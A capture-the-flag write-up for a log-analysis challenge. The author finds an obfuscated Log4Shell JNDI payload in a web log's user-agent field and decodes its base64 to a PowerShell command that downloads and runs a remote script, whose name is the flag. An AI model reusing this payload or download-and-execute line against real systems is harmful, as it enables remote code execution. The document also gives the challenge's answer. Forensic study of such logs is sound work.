Statement: We implemented a basic IPS to help protect our site from new attacks.

Somehow, a newer more sophisticated version of a regularly observed attack was successfully executed against the website.

What is the name of the script that was run?

Flag format: Name of the script that was run, case sensitive.


The challenge provides a JSON file containing logs.

These logs and scenarios are designed to be real-ish, they’re simpler and given that the entire data set covers 1hr all malicious activity is conducted on a condensed time frame.

Searching in the logs, I notice that a log4j exploit has been performed:

{
    "_time": "2021-01-01T09:29:13.000+0000",
    "origin": "119.17.132.75",
    "site": "shop.downunderctf.com",
    "method": "GET",
    "referer": "shop.downunderctf.com/register",
    "useragent": "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://41.108.181.141:5552/Basic/Command/Base64/cG93ZXJzaGVsbC5leGUgLWV4ZWMgYnlwYXNzIC1DICJJRVggKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vZG93bnVuZGVyY3RmLmNvbS9wVENOcDVwNkxQMGQ3cUE3N3l2YjRTSGY0MCcpOyI=}",
    "url": "shop.downunderctf.com/Login",
    "logSource": "Http:Web"
}

The payload is base64 encoded, so I will decode it to read the content and get the name of the script:

echo "cG93ZXJzaGVsbC5leGUgLWV4ZWMgYnlwYXNzIC1DICJJRVggKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vZG93bnVuZGVyY3RmLmNvbS9wVENOcDVwNkxQMGQ3cUE3N3l2YjRTSGY0MCcpOyI=" | base64 -d

Payload value:

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://downunderctf.com/pTCNp5p6LP0d7qA77yvb4SHf40');"

Flag: pTCNp5p6LP0d7qA77yvb4SHf40